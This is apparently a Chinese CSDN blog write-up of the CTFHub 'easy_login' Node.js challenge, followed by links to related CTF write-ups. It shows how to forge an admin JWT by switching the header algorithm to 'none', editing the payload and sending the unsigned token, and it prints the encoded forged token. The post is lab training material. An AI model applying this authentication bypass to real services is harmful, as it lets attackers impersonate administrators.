CTFHUB-2020-虎符-Web-easy_login-Node.js-前端JWT

最新推荐文章于 2024-08-21 14:57:37 发布
最新推荐文章于 2024-08-21 14:57:37 发布
阅读量914 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/grb819/article/details/117886570
版权

!!! 看我


登录安全-伪造admin实现getflag
easy_login

在这里插入图片描述

输入用户名密码注册,在这个时候抓包

在这里插入图片描述

{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MCwidXNlcm5hbWUiOiJhIiwicGFzc3dvcmQiOiJhIiwiaWF0IjoxNjIzNjAyMTgwfQ.VwHlxVpIwoAp8b5NrGjbN56rsZ3IDrt5N9i66aXSYTE"}

在这里插入图片描述

在这里插入图片描述

获取flag 涉及到权限/controllers/api.js

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

第一个值:header里改成none

{
  "alg": "none",
  "typ": "JWT"
}

在这里插入图片描述
ewogICJhbGciOiAibm9uZSIsCiAgInR5cCI6ICJKV1QiCn0=

第二个值:playload 用户名改成admin

{
“secretid”: [],
“username”: “admin”,
“password”: “a”,
“iat”: 1623602180
}

在这里插入图片描述
ewogICJzZWNyZXRpZCI6IFtdLAogICJ1c2VybmFtZSI6ICJhZG1pbiIsCiAgInBhc3N3b3JkIjogImEiLAogICJpYXQiOiAxNjIzNjAyMTgwCn0K
在这里插入图片描述
注意=去掉 第二部分后面要加.

ewogICJhbGciOiAibm9uZSIsCiAgInR5cCI6ICJKV1QiCn0.ewogICJzZWNyZXRpZCI6IFtdLAogICJ1c2VybmFtZSI6ICJhZG1pbiIsCiAgInBhc3N3b3JkIjogImEiLAogICJpYXQiOiAxNjIzNjAyMTgwCn0K.

在这里插入图片描述

数据包放出去

对方就以为你是admin
在这里插入图片描述

在这里插入图片描述

【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞)
时光隧道
03-28 6万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行。eval() 和 exec() 函数。
BugkuCTF-MISC题虎符
am_03的博客
09-04 507
补充: firework类型:1.处理firework标志的图像;2.常见图片解析:图层分解,帧分解 解题: 拿到一个wim文件,直接解压,也可以binwalk梭出来。得到两个文件夹,先看“左”。 图片文件尾部有额外数据,提取出来是一个加密的压缩包 hint.txt给了提示: hint: password并不单一 password: 王大 王井 王井 这个是当铺密码,解出来是65 68 68,不过换了几类形式提交都不正确,这里的并不单一也不知道是什么意思,然后就扔着不做了,之后才知道要把三组数分别asc
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
CTFHub easy-login
longwanlian的博客
05-16 517
ctfhub easy-login解题
CTFHub~JWT漏洞靶场最详细教程
最新发布
weixin_67832625的博客
08-21 1319
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can
CTFHubeasy_login
天天学安全专属博客
03-23 522
CTFHubeasy_login
easy_login通关思路
m0_61506558的博客
09-25 1114
可以大致分为垂直越权,通过JWP令牌验证绕过的方式,最终拿到flag(一)环境准备。
虎符ctf web easy_login
weixin_43896279的博客
04-20 2149
虎符ctf web复现easy_login 我们可以先找到这样一个页面 我们可以看到这里明显提示 路径配置有问题 所以这里尝试读取一下app.js 这里我们分析一下逻辑,注册不能注册成admin, 但只有登录后session 中username为admin才可得到flag 所以这里我们伪造登录token 我们先注册一个账户发现会返回一个token 然后登录时token会作为验证 token为...
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static.zip
04-22
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static
虎符ctf -- vm虚拟机逆向
令则
04-24 2366
文章目录vmdataopcode一些结构还原逆向 一个 调了好久好久的虚拟机题目 原本比赛的时候是上午做了个pyc, 下午开始调vm, 调到结束也没弄出来个道道,tcl, 就开始等待大佬们的wp, 好几天过去, 似乎没有??? 走投无路的菜鸡只好自己慢慢逆, 然后写下这个题目的wp。 欢迎围观 虎符ctf, vm题目, 个人觉得一个比较不错的虚拟机,指令好多,不太好调。 几个简单的虚拟机题目...
JWT利用在ctfhub-easy_login拿到flag
weixin_60719780的博客
03-05 838
JWT的全称是Json Web Token。将用户信息加密到token里,服务器不保存任何用户信息,只保存密钥信息,通过使用特定加密算法验证token;服务器通过密钥验证token的正确性,判断是否通过验证。jwt 之前,使用 session 来做用户认证,session需要服务器执行查询操作。
Easy Login...So Easy...(base64编码/修改Cookie/社工)-学习笔记
小龙在线
08-18 899
问题描述 Easy Login…So Easy… 解题思路 打开靶机显示,然后点击登录,发现无权限,然后查看cookie。 看到一个有很特殊名称cookie urldecode之后是:ZGVtb0BkYmFwcHNlY3VyaXR5LmNvbS5jbg== 明显是base64编码后的,反编码之后是:demo@dbappsecurity.com.cn。 这样就知道了cookie的加密方法是:把邮箱base64编码。 继续寻找,查看源码,发现作者是nwup2008。 <meta name="author
ctf.show的 node.js(web334-web342)
wanan的博客
09-30 626
ctf.show的 node.js(web334-web342)
[HFCTF2020]EasyLogin
devilare的博客
08-31 480
[HFCTF2020]EasyLogin 继续刷题 打开环境,发现是一个登录页面,F12一下,发现有一个js可以看看看到了js代码,但是用处似乎不大,它提示用的是koa框架,了解一下koa目录的基本结构。 我们访问/controllers/api.js得到源码 const crypto = require('crypto'); const fs = require('fs') const jwt = require('jsonwebtoken') const APIError = require('../
BUUCTF-EasyLogin
shawdow_bug的博客
07-15 1101
这是一道 Node.js 语言的题目,在此记录我在做这道题的思考过程。
CTFHub
weixin_45916569的博客
05-07 747
记一次CTFHub easy_login解题思路 根据题目的页面显示,直接下载一个nodejs文档分析, ,我们可以先找到这样一个页面 然后在尝试读取一下api.js 所以说,现在的思路就是要伪造admin账户登入(修改) authorization下的内容是采用JSON格式,需要进行base64解密,但是构造pyload的时候需要进行base64加密,进行请求。 通过base64解密以上的内容可知,此验证可分为三段,前两段为base64加密后面为hs256,加密前两段base64后的结果和一串密钥第
webgoat全关教程手册
热门推荐
黑白的博客
11-08 5万+
Webgoat&Webwolf owaspbwa里面的两个服务 搭建 先要安装jdk、Webgoat和Webwolf Webgoat和Webwolf jdk1.8不支持了,需要安装jdk11 去git上下载Webgoat和Webwolf https://github.com/WebGoat/WebGoat/releases/tag/v8.0.0.M26 去oracle官网下载JDK https://www.oracle.com/java/technologies/javase-jdk11-down
CTFHUB JWT(Json Web Token)
weixin_63231007的博客
11-04 2282
然后看到decode函数这里它本质上使用的还是JWT上的编码的方法,使用的的KEY值是PUBLIC_KEY,也就是题目给出的提示公钥,发现在 JWTHelper类中,decode()、encode()默认的加密解密方式都为“HS256”根据这个条件我们需要编写一个python代码来生成token。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值